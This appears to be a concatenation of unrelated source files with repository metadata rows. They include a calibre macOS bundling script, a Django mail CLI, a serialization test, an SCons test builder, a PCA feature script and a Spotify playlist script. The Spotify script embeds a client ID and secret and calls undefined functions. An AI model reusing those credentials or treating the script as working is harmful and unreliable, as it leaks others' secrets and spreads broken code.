import sys, os, shutil, plistlib, subprocess, glob, zipfile, tempfile, \
py_compile, stat, operator
abspath, join, basename = os.path.abspath, os.path.join, os.path.basename
from setup import __version__ as VERSION, __appname__ as APPNAME, basenames, \
modules as main_modules, Command, SRC, functions as main_functions
LICENSE = open('LICENSE', 'rb').read()
MAGICK_HOME='@executable_path/../Frameworks/ImageMagick'
ENV = dict(
FC_CONFIG_DIR='@executable_path/../Resources/fonts',
FC_CONFIG_FILE='@executable_path/../Resources/fonts/fonts.conf',
MAGICK_CONFIGURE_PATH=MAGICK_HOME+'/config',
MAGICK_CODER_MODULE_PATH=MAGICK_HOME+'/modules-Q16/coders',
MAGICK_CODER_FILTER_PATH=MAGICK_HOME+'/modules-Q16/filter',
QT_PLUGIN_PATH='@executable_path/../MacOS',
PYTHONIOENCODING='UTF-8',
)
SW = os.environ.get('SW', '/sw')
info = warn = None
class OSX32_Freeze(Command):
description = 'Freeze OSX calibre installation'
def add_options(self, parser):
parser.add_option('--test-launchers', default=False,
action='store_true',
help='Only build launchers')
def run(self, opts):
global info, warn
info, warn = self.info, self.warn
main(opts.test_launchers)
def compile_launcher_lib(contents_dir, gcc, base):
info('\tCompiling calibre_launcher.dylib')
fd = join(contents_dir, 'Frameworks')
dest = join(fd, 'calibre-launcher.dylib')
src = join(base, 'util.c')
cmd = [gcc] + '-Wall -arch i386 -arch x86_64 -dynamiclib -std=gnu99'.split() + [src] + \
['-I'+base] + \
['-I/sw/python/Python.framework/Versions/Current/Headers'] + \
'-current_version 1.0 -compatibility_version 1.0'.split() + \
'-fvisibility=hidden -o'.split() + [dest] + \
['-install_name',
'@executable_path/../Frameworks/'+os.path.basename(dest)] + \
['-F/sw/python', '-framework', 'Python', '-framework', 'CoreFoundation', '-headerpad_max_install_names']
info('\t'+' '.join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
return dest
def compile_launchers(contents_dir, xprograms, pyver):
gcc = os.environ.get('CC', 'gcc')
base = os.path.dirname(__file__)
lib = compile_launcher_lib(contents_dir, gcc, base)
src = open(join(base, 'launcher.c'), 'rb').read()
env, env_vals = [], []
for key, val in ENV.items():
env.append('"%s"'% key)
env_vals.append('"%s"'% val)
env = ', '.join(env)+', '
env_vals = ', '.join(env_vals)+', '
src = src.replace('/*ENV_VARS*/', env)
src = src.replace('/*ENV_VAR_VALS*/', env_vals)
programs = [lib]
for program, x in xprograms.items():
module, func = x
info('\tCompiling', program)
out = join(contents_dir, 'MacOS', program)
programs.append(out)
psrc = src.replace('**PROGRAM**', program)
psrc = psrc.replace('**MODULE**', module)
psrc = psrc.replace('**FUNCTION**', func)
psrc = psrc.replace('**PYVER**', pyver)
fsrc = '/tmp/%s.c'%program
with open(fsrc, 'wb') as f:
f.write(psrc)
cmd = [gcc, '-Wall', '-arch', 'x86_64', '-arch', 'i386',
'-I'+base, fsrc, lib, '-o', out,
'-headerpad_max_install_names']
info('\t'+' '.join(cmd))
sys.stdout.flush()
subprocess.check_call(cmd)
return programs
def flipwritable(fn, mode=None):
"""
Flip the writability of a file and return the old mode. Returns None
if the file is already writable.
"""
if os.access(fn, os.W_OK):
return None
old_mode = os.stat(fn).st_mode
os.chmod(fn, stat.S_IWRITE | old_mode)
return old_mode
STRIPCMD = ['/usr/bin/strip', '-x', '-S', '-']
def strip_files(files, argv_max=(256 * 1024)):
"""
Strip a list of files
"""
tostrip = [(fn, flipwritable(fn)) for fn in files if os.path.exists(fn)]
while tostrip:
cmd = list(STRIPCMD)
flips = []
pathlen = reduce(operator.add, [len(s) + 1 for s in cmd])
while pathlen < argv_max:
if not tostrip:
break
added, flip = tostrip.pop()
pathlen += len(added) + 1
cmd.append(added)
flips.append((added, flip))
else:
cmd.pop()
tostrip.append(flips.pop())
os.spawnv(os.P_WAIT, cmd[0], cmd)
for args in flips:
flipwritable(*args)
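# Decorator applied to the Py2App build steps below: flushing stdout/stderr
# around each call keeps log output ordered when it is piped or buffered.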
def flush(func):
def ff(*args, **kwargs):
sys.stdout.flush()
sys.stderr.flush()
ret = func(*args, **kwargs)
sys.stdout.flush()
sys.stderr.flush()
return ret
return ff
class Py2App(object):
FID = '@executable_path/../Frameworks'
def __init__(self, build_dir, test_launchers=False):
self.build_dir = build_dir
self.contents_dir = join(self.build_dir, 'Contents')
self.resources_dir = join(self.contents_dir, 'Resources')
self.frameworks_dir = join(self.contents_dir, 'Frameworks')
self.version_info = '.'.join(map(str, sys.version_info[:2]))
self.site_packages = join(self.resources_dir, 'Python', 'site-packages')
self.to_strip = []
self.warnings = []
self.run(test_launchers)
def warn(self, *args):
warn(*args)
def run(self, test_launchers):
ret = 0
if not test_launchers:
if os.path.exists(self.build_dir):
shutil.rmtree(self.build_dir)
os.makedirs(self.build_dir)
self.create_skeleton()
self.create_plist()
self.add_python_framework()
self.add_site_packages()
self.add_stdlib()
self.add_qt_frameworks()
self.add_calibre_plugins()
self.add_podofo()
self.add_poppler()
self.add_libjpeg()
self.add_libpng()
self.add_fontconfig()
self.add_imagemagick()
self.add_misc_libraries()
self.add_resources()
self.compile_py_modules()
self.create_console_app()
self.copy_site()
self.create_exe()
if not test_launchers:
self.strip_files()
ret = self.makedmg(self.build_dir, APPNAME+'-'+VERSION)
return ret
@flush
def add_resources(self):
shutil.copytree('resources', os.path.join(self.resources_dir,
'resources'))
@flush
def strip_files(self):
info('\nStripping files...')
strip_files(self.to_strip)
@flush
def create_exe(self):
info('\nCreating launchers')
programs = {}
progs = []
for x in ('console', 'gui'):
progs += list(zip(basenames[x], main_modules[x], main_functions[x]))
for program, module, func in progs:
programs[program] = (module, func)
programs = compile_launchers(self.contents_dir, programs,
self.version_info)
for out in programs:
self.fix_dependencies_in_lib(out)
@flush
def set_id(self, path_to_lib, new_id):
old_mode = flipwritable(path_to_lib)
subprocess.check_call(['install_name_tool', '-id', new_id, path_to_lib])
if old_mode is not None:
flipwritable(path_to_lib, old_mode)
@flush
def get_dependencies(self, path_to_lib):
raw = subprocess.Popen(['otool', '-L', path_to_lib],
stdout=subprocess.PIPE).stdout.read()
for line in raw.splitlines():
if 'compatibility' not in line or line.strip().endswith(':'):
continue
idx = line.find('(')
path = line[:idx].strip()
yield path
@flush
def get_local_dependencies(self, path_to_lib):
for x in self.get_dependencies(path_to_lib):
for y in (SW+'/lib/', '/usr/local/lib/', SW+'/qt/lib/',
'/opt/local/lib/',
SW+'/python/Python.framework/', SW+'/freetype/lib/'):
if x.startswith(y):
if y == SW+'/python/Python.framework/':
y = SW+'/python/'
yield x, x[len(y):]
break
@flush
def change_dep(self, old_dep, new_dep, path_to_lib):
info('\tResolving dependency %s to'%old_dep, new_dep)
subprocess.check_call(['install_name_tool', '-change', old_dep, new_dep,
path_to_lib])
@flush
def fix_dependencies_in_lib(self, path_to_lib):
info('\nFixing dependencies in', path_to_lib)
self.to_strip.append(path_to_lib)
old_mode = flipwritable(path_to_lib)
for dep, bname in self.get_local_dependencies(path_to_lib):
ndep = self.FID+'/'+bname
self.change_dep(dep, ndep, path_to_lib)
if list(self.get_local_dependencies(path_to_lib)):
raise Exception('Failed to resolve deps in: '+path_to_lib)
if old_mode is not None:
flipwritable(path_to_lib, old_mode)
@flush
def add_python_framework(self):
info('\nAdding Python framework')
src = join('/sw/python', 'Python.framework')
x = join(self.frameworks_dir, 'Python.framework')
curr = os.path.realpath(join(src, 'Versions', 'Current'))
currd = join(x, 'Versions', basename(curr))
rd = join(currd, 'Resources')
os.makedirs(rd)
shutil.copy2(join(curr, 'Resources', 'Info.plist'), rd)
shutil.copy2(join(curr, 'Python'), currd)
self.set_id(join(currd, 'Python'),
self.FID+'/Python.framework/Versions/%s/Python'%basename(curr))
@flush
def add_qt_frameworks(self):
info('\nAdding Qt Framework')
for f in ('QtCore', 'QtGui', 'QtXml', 'QtNetwork', 'QtSvg', 'QtWebKit',
'QtXmlPatterns'):
self.add_qt_framework(f)
for d in glob.glob(join(SW, 'qt', 'plugins', '*')):
shutil.copytree(d, join(self.contents_dir, 'MacOS', basename(d)))
for l in glob.glob(join(self.contents_dir, 'MacOS', '*/*.dylib')):
self.fix_dependencies_in_lib(l)
x = os.path.relpath(l, join(self.contents_dir, 'MacOS'))
self.set_id(l, '@executable_path/'+x)
@flush
def add_qt_framework(self, f):
libname = f
f = f+'.framework'
src = join(SW, 'qt', 'lib', f)
ignore = shutil.ignore_patterns('Headers', '*.h', 'Headers/*')
dest = join(self.frameworks_dir, f)
shutil.copytree(src, dest, symlinks=True,
ignore=ignore)
lib = os.path.realpath(join(dest, libname))
rpath = os.path.relpath(lib, self.frameworks_dir)
self.set_id(lib, self.FID+'/'+rpath)
self.fix_dependencies_in_lib(lib)
@flush
def create_skeleton(self):
c = join(self.build_dir, 'Contents')
for x in ('Frameworks', 'MacOS', 'Resources'):
os.makedirs(join(c, x))
for x in ('library.icns', 'book.icns'):
shutil.copyfile(join('icons', x), join(self.resources_dir, x))
@flush
def add_calibre_plugins(self):
dest = join(self.frameworks_dir, 'plugins')
os.mkdir(dest)
for f in glob.glob('src/calibre/plugins/*.so'):
shutil.copy2(f, dest)
self.fix_dependencies_in_lib(join(dest, basename(f)))
@flush
def create_plist(self):
from calibre.ebooks import BOOK_EXTENSIONS
env = dict(**ENV)
        env['CALIBRE_LAUNCHED_FROM_BUNDLE'] = '1'
docs = [{'CFBundleTypeName':'E-book',
'CFBundleTypeExtensions':list(BOOK_EXTENSIONS),
'CFBundleTypeRole':'Viewer',
}]
pl = dict(
CFBundleDevelopmentRegion='English',
CFBundleDisplayName=APPNAME,
CFBundleName=APPNAME,
CFBundleIdentifier='net.kovidgoyal.calibre',
CFBundleVersion=VERSION,
CFBundleShortVersionString=VERSION,
CFBundlePackageType='APPL',
CFBundleSignature='????',
CFBundleExecutable='calibre',
CFBundleDocumentTypes=docs,
LSMinimumSystemVersion='10.5.2',
LSRequiresNativeExecution=True,
NSAppleScriptEnabled=False,
NSHumanReadableCopyright='Copyright 2010, Kovid Goyal',
CFBundleGetInfoString=('calibre, an E-book management '
'application. Visit http://calibre-ebook.com for details.'),
CFBundleIconFile='library.icns',
LSMultipleInstancesProhibited=True,
NSHighResolutionCapable=True,
LSEnvironment=env
)
plistlib.writePlist(pl, join(self.contents_dir, 'Info.plist'))
@flush
def install_dylib(self, path, set_id=True):
shutil.copy2(path, self.frameworks_dir)
if set_id:
self.set_id(join(self.frameworks_dir, basename(path)),
self.FID+'/'+basename(path))
self.fix_dependencies_in_lib(join(self.frameworks_dir, basename(path)))
@flush
def add_podofo(self):
info('\nAdding PoDoFo')
pdf = join(SW, 'lib', 'libpodofo.0.9.1.dylib')
self.install_dylib(pdf)
@flush
def add_poppler(self):
info('\nAdding poppler')
for x in ('libpoppler.27.dylib',):
self.install_dylib(os.path.join(SW, 'lib', x))
for x in ('pdftohtml', 'pdftoppm', 'pdfinfo'):
self.install_dylib(os.path.join(SW, 'bin', x), False)
@flush
def add_libjpeg(self):
info('\nAdding libjpeg')
self.install_dylib(os.path.join(SW, 'lib', 'libjpeg.8.dylib'))
@flush
def add_libpng(self):
info('\nAdding libpng')
self.install_dylib(os.path.join(SW, 'lib', 'libpng12.0.dylib'))
self.install_dylib(os.path.join(SW, 'lib', 'libpng.3.dylib'))
@flush
def add_fontconfig(self):
info('\nAdding fontconfig')
for x in ('fontconfig.1', 'freetype.6', 'expat.1'):
src = os.path.join(SW, 'lib', 'lib'+x+'.dylib')
self.install_dylib(src)
dst = os.path.join(self.resources_dir, 'fonts')
if os.path.exists(dst):
shutil.rmtree(dst)
src = os.path.join(SW, 'etc', 'fonts')
shutil.copytree(src, dst, symlinks=False)
fc = os.path.join(dst, 'fonts.conf')
raw = open(fc, 'rb').read()
raw = raw.replace('<dir>/usr/share/fonts</dir>', '''\
<dir>/Library/Fonts</dir>
<dir>/Network/Library/Fonts</dir>
<dir>/System/Library/Fonts</dir>
<dir>/usr/X11R6/lib/X11/fonts</dir>
<dir>/usr/share/fonts</dir>
<dir>/var/root/Library/Fonts</dir>
<dir>/usr/share/fonts</dir>
''')
open(fc, 'wb').write(raw)
@flush
def add_imagemagick(self):
info('\nAdding ImageMagick')
for x in ('Wand', 'Core'):
self.install_dylib(os.path.join(SW, 'lib', 'libMagick%s.5.dylib'%x))
idir = glob.glob(os.path.join(SW, 'lib', 'ImageMagick-*'))[-1]
dest = os.path.join(self.frameworks_dir, 'ImageMagick')
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(idir, dest, True)
for x in os.walk(dest):
for f in x[-1]:
if f.endswith('.so'):
f = join(x[0], f)
self.fix_dependencies_in_lib(f)
@flush
def add_misc_libraries(self):
for x in ('usb-1.0.0', 'mtp.9', 'unrar', 'readline.6.1',
'wmflite-0.2.7', 'chm.0', 'sqlite3.0'):
info('\nAdding', x)
x = 'lib%s.dylib'%x
shutil.copy2(join(SW, 'lib', x), self.frameworks_dir)
dest = join(self.frameworks_dir, x)
self.set_id(dest, self.FID+'/'+x)
if 'mtp' in x:
self.fix_dependencies_in_lib(dest)
@flush
def add_site_packages(self):
info('\nAdding site-packages')
os.makedirs(self.site_packages)
paths = reversed(map(abspath, [x for x in sys.path if x.startswith('/')]))
upaths = []
for x in paths:
if x not in upaths and (x.endswith('.egg') or
x.endswith('/site-packages')):
upaths.append(x)
upaths.append(os.path.expanduser('~/build/calibre/src'))
for x in upaths:
info('\t', x)
tdir = None
try:
if not os.path.isdir(x):
try:
zf = zipfile.ZipFile(x)
except:
self.warn(x, 'is neither a directory nor a zipfile')
continue
tdir = tempfile.mkdtemp()
zf.extractall(tdir)
x = tdir
self.add_modules_from_dir(x)
self.add_packages_from_dir(x)
finally:
if tdir is not None:
shutil.rmtree(tdir)
shutil.rmtree(os.path.join(self.site_packages, 'calibre', 'plugins'))
self.remove_bytecode(join(self.resources_dir, 'Python', 'site-packages'))
@flush
def add_modules_from_dir(self, src):
for x in glob.glob(join(src, '*.py'))+glob.glob(join(src, '*.so')):
shutil.copy2(x, self.site_packages)
if x.endswith('.so'):
self.fix_dependencies_in_lib(x)
@flush
def add_packages_from_dir(self, src):
for x in os.listdir(src):
x = join(src, x)
if os.path.isdir(x) and os.path.exists(join(x, '__init__.py')):
if self.filter_package(basename(x)):
continue
self.add_package_dir(x)
@flush
def add_package_dir(self, x, dest=None):
def ignore(root, files):
ans = []
for y in files:
ext = os.path.splitext(y)[1]
if ext not in ('', '.py', '.so') or \
(not ext and not os.path.isdir(join(root, y))):
ans.append(y)
return ans
if dest is None:
dest = self.site_packages
dest = join(dest, basename(x))
shutil.copytree(x, dest, symlinks=True, ignore=ignore)
self.postprocess_package(x, dest)
for x in os.walk(dest):
for f in x[-1]:
if f.endswith('.so'):
f = join(x[0], f)
self.fix_dependencies_in_lib(f)
@flush
def filter_package(self, name):
return name in ('Cython', 'modulegraph', 'macholib', 'py2app',
'bdist_mpkg', 'altgraph')
@flush
def postprocess_package(self, src_path, dest_path):
pass
@flush
def add_stdlib(self):
info('\nAdding python stdlib')
src = '/sw/python/Python.framework/Versions/Current/lib/python'
src += self.version_info
dest = join(self.resources_dir, 'Python', 'lib', 'python')
dest += self.version_info
os.makedirs(dest)
for x in os.listdir(src):
if x in ('site-packages', 'config', 'test', 'lib2to3', 'lib-tk',
'lib-old', 'idlelib', 'plat-mac', 'plat-darwin', 'site.py'):
continue
x = join(src, x)
if os.path.isdir(x):
self.add_package_dir(x, dest)
elif os.path.splitext(x)[1] in ('.so', '.py'):
shutil.copy2(x, dest)
dest2 = join(dest, basename(x))
if dest2.endswith('.so'):
self.fix_dependencies_in_lib(dest2)
self.remove_bytecode(join(self.resources_dir, 'Python', 'lib'))
confdir = join(self.resources_dir, 'Python',
'lib/python%s/config'%self.version_info)
os.makedirs(confdir)
shutil.copy2(join(src, 'config/Makefile'), confdir)
incdir = join(self.resources_dir, 'Python',
'include/python'+self.version_info)
os.makedirs(incdir)
shutil.copy2(join(src.replace('/lib/', '/include/'), 'pyconfig.h'),
incdir)
@flush
def remove_bytecode(self, dest):
for x in os.walk(dest):
root = x[0]
for f in x[-1]:
                if os.path.splitext(f)[1] in ('.pyc', '.pyo'):
os.remove(join(root, f))
@flush
def compile_py_modules(self):
info( '\nCompiling Python modules')
base = join(self.resources_dir, 'Python')
for x in os.walk(base):
root = x[0]
for f in x[-1]:
if f.endswith('.py'):
y = join(root, f)
rel = os.path.relpath(y, base)
try:
py_compile.compile(y, dfile=rel, doraise=True)
os.remove(y)
except:
self.warn('WARNING: Failed to byte-compile', y)
@flush
def create_console_app(self):
info( '\nCreating console.app')
cc_dir = os.path.join(self.contents_dir, 'console.app', 'Contents')
os.makedirs(cc_dir)
for x in os.listdir(self.contents_dir):
if x == 'console.app':
continue
if x == 'Info.plist':
plist = plistlib.readPlist(join(self.contents_dir, x))
plist['LSUIElement'] = '1'
plist.pop('CFBundleDocumentTypes')
plistlib.writePlist(plist, join(cc_dir, x))
else:
os.symlink(join('../..', x),
join(cc_dir, x))
@flush
def copy_site(self):
base = os.path.dirname(__file__)
shutil.copy2(join(base, 'site.py'), join(self.resources_dir, 'Python',
'lib', 'python'+self.version_info))
@flush
def makedmg(self, d, volname,
destdir='dist',
internet_enable=True,
format='UDBZ'):
''' Copy a directory d into a dmg named volname '''
info('\nCreating dmg')
sys.stdout.flush()
if not os.path.exists(destdir):
os.makedirs(destdir)
dmg = os.path.join(destdir, volname+'.dmg')
if os.path.exists(dmg):
os.unlink(dmg)
tdir = tempfile.mkdtemp()
appdir = os.path.join(tdir, os.path.basename(d))
shutil.copytree(d, appdir, symlinks=True)
subprocess.check_call(['/Users/kovid/sign.sh', appdir])
os.symlink('/Applications', os.path.join(tdir, 'Applications'))
subprocess.check_call(['/usr/bin/hdiutil', 'create', '-srcfolder', tdir,
'-volname', volname, '-format', format, dmg])
shutil.rmtree(tdir)
if internet_enable:
subprocess.check_call(['/usr/bin/hdiutil', 'internet-enable', '-yes', dmg])
size = os.stat(dmg).st_size/(1024*1024.)
info('\nInstaller size: %.2fMB\n'%size)
return dmg
def test_exe():
build_dir = abspath(join('build', APPNAME+'.app'))
py2app = Py2App(build_dir)
py2app.create_exe()
return 0
def main(test=False):
if 'test_exe' in sys.argv:
return test_exe()
build_dir = abspath(join(os.path.dirname(SRC), 'build', APPNAME+'.app'))
Py2App(build_dir, test_launchers=test)
return 0
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 | 4,389,795,545,550,242,300 | 35.423313 | 116 | 0.542909 | false |
Tecktron/quickmailer | quickmail.py | 1 | 3408 | import argparse
import os
import re
import sys
if __name__ == "__main__":
if sys.version_info < (3, 0):
print("This script requires version 3+ of python. Please try running it with command 'python3' instead")
exit(8)
parser = argparse.ArgumentParser(
description="Quick Mailer"
)
parser.add_argument("-m", "--message", dest="msg", type=str, required=True,
help="The plain text message or filename of a message to send")
parser.add_argument("-t", "--to", dest="to", nargs="+", metavar="[email protected]", type=str,
help="Email address to recieve the message", required=True)
parser.add_argument("-f", "--from", dest="sender", type=str, required=False,
help="The from Email, if not provided, the settings will be used. NOTE: A specific address may "
"be required by your SMTP server")
parser.add_argument("-s", "--subject", dest="subject", required=True, type=str, help="The subject line")
parser.add_argument("-w", "--html", dest="html", action="store_true", required=False,
help="If using a file for m and file is html set this flag to use html email")
parser.add_argument("-a", "--attach", dest="attach", metavar="/path/to/file.txt", nargs="*", required=False,
help="files to attach (use full path)", default=[])
args = parser.parse_args()
# Here we inject the settings and load django
if not os.environ.get("DJANGO_SETTINGS_MODULE", False):
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "base.settings")
try:
import django
from django.conf import settings
except ImportError:
django = None
settings = None
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
django.setup()
# don't import Django things until after setup or errors abound
from django.core.mail import EmailMessage, EmailMultiAlternatives
from django.utils.html import strip_tags
msg = ""
is_file = False
if os.path.isfile(args.msg) is False:
msg = "{}".format(args.msg)
else:
try:
msg = open(args.msg).read()
except OSError as e:
print("Could not read msg file, exception said: {}".format(e))
exit(4)
sender = args.sender
if not sender:
sender = settings.DEFAULT_FROM_EMAIL
if args.html:
# quick and dirty, create a plain text version.
# replace breaks and paragraphs with newlines
plain = re.sub("<br\s*?>", "\n", msg)
plain = re.sub("</p>", "\n\n", plain)
# strip the rest of the tags.
plain = strip_tags(plain)
email = EmailMultiAlternatives(args.subject, plain, sender, args.to)
email.attach_alternative(msg, "text/html")
else:
email = EmailMessage(args.subject, msg, sender, args.to)
if len(args.attach):
for attachment in args.attach:
if os.path.isfile(attachment):
email.attach_file(attachment)
sent = email.send()
if sent:
print("Email sent successfully")
else:
print("There was an issue sending the message")
| mit | -8,947,849,462,155,596,000 | 39.094118 | 120 | 0.60446 | false |
eidonfiloi/SparseRecurrentNetwork | tests/SerializationTest.py | 1 | 1546 | __author__ = 'ptoth'
import config.sr_network_configuration_test as base_config
import unittest
import pickle
import numpy as np
from recurrent_network.Network import *
class SerializationTest(unittest.TestCase):
def test_pickle(self):
params = base_config.get_config()
params['global']['epochs'] = 2
network = SRNetwork(params['network'])
constant = np.array([
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
[0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0]
])
inputs = constant
for inp in inputs:
output = network.run(inp)
weights = network.layers[0].feedforward_node.weights
with open('test_network_serialized.pickle', 'wb') as f:
pickle.dump(network, f)
# network.serialize('test_network_serialized.pickle')
with open('test_network_serialized.pickle', "rb") as f:
x = pickle.load(f)
network_loaded = x
print network_loaded
self.assertTrue((weights[0] == network_loaded.layers[0].feedforward_node.weights[0]).all())
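# Standard unittest entry point so the test module can be run directly:
if __name__ == '__main__':
    unittest.main()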
| mit | 8,890,712,304,412,624,000 | 30.55102 | 99 | 0.518111 | false |
pkrusche/bsponmpi_template | site_scons/site_tools/unit_tests.py | 1 | 1693 | ###############################################################################
# Copyright (C) 2013 Peter Krusche, The University of Warwick
# [email protected]
###############################################################################
import os
from SCons.Script import *
###############################################################################
# Unit Testing
###############################################################################
"""Unit test builder function
"""
def builder_unit_test(target, source, env):
app = str(source[0].abspath)
xenv = os.environ
if 'TEST_ENV' in env:
for k in env['TEST_ENV']:
xenv[k] = env['TEST_ENV'][k]
if os.spawnle(os.P_WAIT, app, app, xenv) == 0:
open(str(target[0]),'w').write("PASSED\n")
else:
return 1
"""Unit test builder function which uses MPI
"""
def builder_unit_test_mpi(target, source, env):
# for MPI tests, we run with these processor counts
mpiexec = env["mpiexec"]
mpiexec_params = env["mpiexec_params"]
app = str(source[0].abspath)
runme = mpiexec + " " + mpiexec_params + ' "' + app + '" > ' + str(target[0])
print "Test: running " + runme
if os.system(runme) == 0:
open(str(target[0]),'a').write("PASSED\n")
else:
return 1
"""Set up an environment for using unit testing
@param env : the environment
"""
def generate(env):
# Create a builder for tests
if not env['mpiexec']:
bld = Builder(action = builder_unit_test)
env.Append(BUILDERS = {'Test' : bld})
else:
bld = Builder(action = builder_unit_test_mpi)
env.Append(BUILDERS = {'Test' : bld})
"""Check if environment supports unit testing
@param env : the environment
"""
def exists(env):
return 1
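# Illustrative SConscript usage of the Test builder registered above
# (target and program names are placeholders):
#   env.Tool('unit_tests')
#   prog = env.Program('test_foo', ['test_foo.cpp'])
#   env.Test('test_foo.passed', prog)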
| mit | 7,341,181,985,593,530,000 | 25.046154 | 79 | 0.532191 | false |
NCLAB2016/DF_STEALL_ELECTRIC | merge_feature.py | 1 | 3169 | #!/usr/bin/python
import csv
import numpy as np
from six.moves import cPickle as pickle
# read in data
dataset = 'dataset/'
train_season_statis_filename = dataset + 'final_train_season_statis.pickle'
train_month_statis_filename = dataset + 'final_train_month_statis.pickle'
train_dwt_filename = dataset + 'final_train_dwt.pickle'
train_all_data_filename = dataset + 'final_train_data_statis.pickle'
test_season_statis_filename = dataset + 'final_test_season_statis.pickle'
test_month_statis_filename = dataset + 'final_test_month_statis.pickle'
test_dwt_filename = dataset + 'final_test_dwt.pickle'
test_all_data_filename = dataset + 'final_test_data_statis.pickle'
with open(train_season_statis_filename, 'rb') as f:
train_season_statis = pickle.load(f)
with open(train_month_statis_filename, 'rb') as f:
train_month_statis = pickle.load(f)
with open(train_dwt_filename, 'rb') as f:
train_dwt = pickle.load(f)
with open(train_all_data_filename, 'rb') as f:
train_all_data = pickle.load(f)
with open(test_season_statis_filename, 'rb') as f:
test_season_statis = pickle.load(f)
with open(test_month_statis_filename, 'rb') as f:
test_month_statis = pickle.load(f)
with open(test_dwt_filename, 'rb') as f:
test_dwt = pickle.load(f)
with open(test_all_data_filename, 'rb') as f:
test_all_data = pickle.load(f)
from sklearn.decomposition import PCA
print ('train all data: ', train_all_data.shape)
print ('test all data: ', test_all_data.shape)
print ('construct train & test data...')
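# NaN is the only value for which x != x holds, so this loop replaces missing
# readings with -1 before PCA (np.isnan would be an equivalent vectorised check).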
for i in range(len(train_all_data)):
for j in range(len(train_all_data[i])):
if train_all_data[i][j] != train_all_data[i][j]:
train_all_data[i][j] = -1
train_data = PCA(100).fit_transform(train_all_data[:,:3105])
test_data = PCA(100).fit_transform(test_all_data[:,:3105])
train_data = np.column_stack((train_data, train_all_data[:,3105:]))
test_data = np.column_stack((test_data, test_all_data[:,3105:]))
print ('train month statis: ', train_month_statis.shape)
print ('test month statis: ', test_month_statis.shape)
print ('connect month statis...')
train_data = np.column_stack((train_data, PCA(50).fit_transform(train_month_statis)))
test_data = np.column_stack((test_data, PCA(50).fit_transform(test_month_statis)))
print ('train season statis: ', train_season_statis.shape)
print ('test season statis: ', test_season_statis.shape)
print ('connect season statis...')
train_data = np.column_stack((train_data, PCA(30).fit_transform(train_season_statis)))
test_data = np.column_stack((test_data, PCA(30).fit_transform(test_season_statis)))
print ('train dwt statis: ', train_dwt.shape)
print ('test dwt statis: ', test_dwt.shape)
print ('connect dwt...')
train_data = np.column_stack((train_data, PCA(5).fit_transform(train_dwt)))
test_data = np.column_stack((test_data, PCA(5).fit_transform(test_dwt)))
print ('final, train data: ', train_data.shape)
print ('test data: ', test_data.shape)
print ('write data now..')
with open(dataset + 'final_train_amsd.pickle', 'wb') as f:
pickle.dump(train_data, f, pickle.HIGHEST_PROTOCOL)
with open(dataset + 'final_test_amsd.pickle', 'wb') as f:
pickle.dump(test_data, f, pickle.HIGHEST_PROTOCOL)
| gpl-3.0 | -4,707,812,709,093,395,000 | 38.6125 | 86 | 0.712212 | false |
siquick/mostplayed | mp/ss_playlist.py | 1 | 2275 | import requests
import json
import hashlib # used to generate the key for the insert
import base64
def req_auth():
# request authorization
auth_code = base64.b64encode('2b9b835a9d2d45eab79778233e9142e4:6783d4b5790a4f5aaa94b863c30fc215')
headers = {'Authorization': 'Basic ' + auth_code}
auth_url = 'https://accounts.spotify.com/api/token'
body = {'grant_type': 'client_credentials'}
r = requests.post(auth_url, data=body, headers=headers)
r_json = json.loads(r.text)
return r_json['access_token']
# gets a list of the good records that are on Spotify
def get_records():
query = db_select('''SELECT x.spotify_url,x.date,x.id,x.all_artists,x.title,sum(num) as total FROM
(SELECT releases.*,COUNT(listens.release_id) * 5 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.listens
ON listens.release_id=releases.id
#WHERE year(releases.date)='2017'
GROUP BY releases.id
UNION ALL
SELECT releases.*,COUNT(ce.release_id) * 10 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.charts_extended ce
ON ce.release_id=releases.id
#WHERE year(releases.date)='2017'
WHERE ce.url!='Ghost'
GROUP BY releases.id
UNION ALL
SELECT releases.*,COUNT(buys.release_id) * 15 as num
FROM soundshe.releases_all releases
INNER JOIN soundshe.buys
ON buys.release_id=releases.id
#WHERE year(releases.date)='2017'
GROUP BY releases.id
) as x
WHERE x.spotify_url!=''
AND datediff(now(),x.date) < 30
AND x.genre IN ('House','Techno','Disco','Bass')
GROUP by x.id
ORDER BY total DESC
LIMIT 0,10''', ())
get_data = query.fetchall()
for row in get_data:
print(row[0], row[3], row[4])
# add_done = add_tracks(access_token,num_tracks,time_range,user_id,owner_id,playlist_id,now)
access_token = get_access_token(code)
print(access_token)
# x = get_records()
# print(x)
| gpl-3.0 | 4,837,883,844,478,587,000 | 35.693548 | 102 | 0.57978 | false |
sonofmun/DissProject | Chapter_3/graph_cs_corps.py | 1 | 1217 | __author__ = 'matt'
"""
Bar chart demo with pairs of bars grouped for easy comparison.
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#corps = [('NT', (0, 1, 2, 3, 4, 5)), ('LXX', (0, 1, 2, 3, 4, 5)), ('Josephus', (0, 1, 2, 3, 4, 5)), ('Philo', (0, 1, 2, 3, 4, 5)), ('Plutarch', (0, 1, 2, 3, 4, 5)), ('Perseus', (0, 1, 2, 3, 4, 5))]
